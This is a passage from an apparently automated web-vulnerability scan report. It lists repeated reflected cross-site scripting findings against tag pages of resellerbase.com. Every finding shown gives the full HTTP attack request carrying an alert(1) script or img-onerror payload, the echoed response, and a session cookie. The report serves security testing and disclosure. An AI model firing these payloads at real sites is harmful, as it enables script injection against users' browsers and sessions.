<title>Browse by Tag: adultc2c75</title><img src=a onerror=alert(1)>178e0613c93</title>
...[SNIP]...

2.4189. http://www.resellerbase.com/tag/adult+content [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5c21<script>alert(1)</script>ffd0acf0037486f3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagb5c21<script>alert(1)</script>ffd0acf0037486f3d/adult+content?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb5c21<script>alert(1)</script>ffd0acf0037486f3d/adult+content?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4190. http://www.resellerbase.com/tag/adult+content [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d1b5<script>alert(1)</script>4524f89d6bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag6d1b5<script>alert(1)</script>4524f89d6bf/adult+content HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6d1b5<script>alert(1)</script>4524f89d6bf/adult+content was not found on this server.</p>
...[SNIP]...

2.4191. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2d567</title><img%20src%3da%20onerror%3dalert(1)>a57b0468dee659e7 was submitted in the REST URL parameter 2. This input was echoed as 2d567</title><img src=a onerror=alert(1)>a57b0468dee659e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult+content2d567</title><img%20src%3da%20onerror%3dalert(1)>a57b0468dee659e7?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult content2d567</title><img src=a onerror=alert(1)>a57b0468dee659e7</title>
...[SNIP]...

2.4192. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c1d3d</title><img%20src%3da%20onerror%3dalert(1)>6247e3c8b57 was submitted in the REST URL parameter 2. This input was echoed as c1d3d</title><img src=a onerror=alert(1)>6247e3c8b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adult+contentc1d3d</title><img%20src%3da%20onerror%3dalert(1)>6247e3c8b57 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult contentc1d3d</title><img src=a onerror=alert(1)>6247e3c8b57</title>
...[SNIP]...

2.4193. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66e65<img%20src%3da%20onerror%3dalert(1)>e3ec462854e9d13ca was submitted in the REST URL parameter 2. This input was echoed as 66e65<img src=a onerror=alert(1)>e3ec462854e9d13ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult+content66e65<img%20src%3da%20onerror%3dalert(1)>e3ec462854e9d13ca?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adult content66e65<img src=a onerror=alert(1)>e3ec462854e9d13ca]</td>
...[SNIP]...

2.4194. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1823d<img%20src%3da%20onerror%3dalert(1)>e05abd21e90 was submitted in the REST URL parameter 2. This input was echoed as 1823d<img src=a onerror=alert(1)>e05abd21e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adult+content1823d<img%20src%3da%20onerror%3dalert(1)>e05abd21e90 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adult content1823d<img src=a onerror=alert(1)>e05abd21e90]</td>
...[SNIP]...

2.4195. http://www.resellerbase.com/tag/broadband [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad629<script>alert(1)</script>e95c0cc8a8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagad629<script>alert(1)</script>e95c0cc8a8d/broadband HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagad629<script>alert(1)</script>e95c0cc8a8d/broadband was not found on this server.</p>
...[SNIP]...

2.4196. http://www.resellerbase.com/tag/broadband [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca2ac<script>alert(1)</script>01fb17ac57451c4e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagca2ac<script>alert(1)</script>01fb17ac57451c4e3/broadband?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagca2ac<script>alert(1)</script>01fb17ac57451c4e3/broadband?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4197. http://www.resellerbase.com/tag/broadband [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1170<img%20src%3da%20onerror%3dalert(1)>c92f234f10a8f8be4 was submitted in the REST URL parameter 2. This input was echoed as b1170<img src=a onerror=alert(1)>c92f234f10a8f8be4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/broadbandb1170<img%20src%3da%20onerror%3dalert(1)>c92f234f10a8f8be4?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broad
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : broadbandb1170<img src=a onerror=alert(1)>c92f234f10a8f8be4]</td>
...[SNIP]...

2.4198. http://www.resellerbase.com/tag/broadband [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4dfea<img%20src%3da%20onerror%3dalert(1)>0dc63de63ca was submitted in the REST URL parameter 2. This input was echoed as 4dfea<img src=a onerror=alert(1)>0dc63de63ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/broadband4dfea<img%20src%3da%20onerror%3dalert(1)>0dc63de63ca HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broad
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : broadband4dfea<img src=a onerror=alert(1)>0dc63de63ca]</td>
...[SNIP]...

2.4199. http://www.resellerbase.com/tag/broadband [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 77fd0</title><img%20src%3da%20onerror%3dalert(1)>f0eabf14d20 was submitted in the REST URL parameter 2. This input was echoed as 77fd0</title><img src=a onerror=alert(1)>f0eabf14d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/broadband77fd0</title><img%20src%3da%20onerror%3dalert(1)>f0eabf14d20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broadband77fd0</title><img src=a onerror=alert(1)>f0eabf14d20</title>
...[SNIP]...

2.4200. http://www.resellerbase.com/tag/broadband [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b5495</title><img%20src%3da%20onerror%3dalert(1)>e0f28f4e6e41577c9 was submitted in the REST URL parameter 2. This input was echoed as b5495</title><img src=a onerror=alert(1)>e0f28f4e6e41577c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/broadbandb5495</title><img%20src%3da%20onerror%3dalert(1)>e0f28f4e6e41577c9?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broadbandb5495</title><img src=a onerror=alert(1)>e0f28f4e6e41577c9</title>
...[SNIP]...

2.4201. http://www.resellerbase.com/tag/cam [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddcc0<script>alert(1)</script>492aa202f76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagddcc0<script>alert(1)</script>492aa202f76/cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagddcc0<script>alert(1)</script>492aa202f76/cam was not found on this server.</p>
...[SNIP]...

2.4202. http://www.resellerbase.com/tag/cam [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d708f<script>alert(1)</script>1e2c38309fc844e6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd708f<script>alert(1)</script>1e2c38309fc844e6f/cam?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd708f<script>alert(1)</script>1e2c38309fc844e6f/cam?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4203. http://www.resellerbase.com/tag/cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 171e7</title><img%20src%3da%20onerror%3dalert(1)>7a91239444c456c6a was submitted in the REST URL parameter 2. This input was echoed as 171e7</title><img src=a onerror=alert(1)>7a91239444c456c6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cam171e7</title><img%20src%3da%20onerror%3dalert(1)>7a91239444c456c6a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cam171e7</title><img src=a onerror=alert(1)>7a91239444c456c6a</title>
...[SNIP]...

2.4204. http://www.resellerbase.com/tag/cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eefdd<img%20src%3da%20onerror%3dalert(1)>78cff4e21bb5b040b was submitted in the REST URL parameter 2. This input was echoed as eefdd<img src=a onerror=alert(1)>78cff4e21bb5b040b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cameefdd<img%20src%3da%20onerror%3dalert(1)>78cff4e21bb5b040b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: camee
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cameefdd<img src=a onerror=alert(1)>78cff4e21bb5b040b]</td>
...[SNIP]...

2.4205. http://www.resellerbase.com/tag/cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 23b25</title><img%20src%3da%20onerror%3dalert(1)>2e9c7ba787b was submitted in the REST URL parameter 2. This input was echoed as 23b25</title><img src=a onerror=alert(1)>2e9c7ba787b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cam23b25</title><img%20src%3da%20onerror%3dalert(1)>2e9c7ba787b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cam23b25</title><img src=a onerror=alert(1)>2e9c7ba787b</title>
...[SNIP]...

2.4206. http://www.resellerbase.com/tag/cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
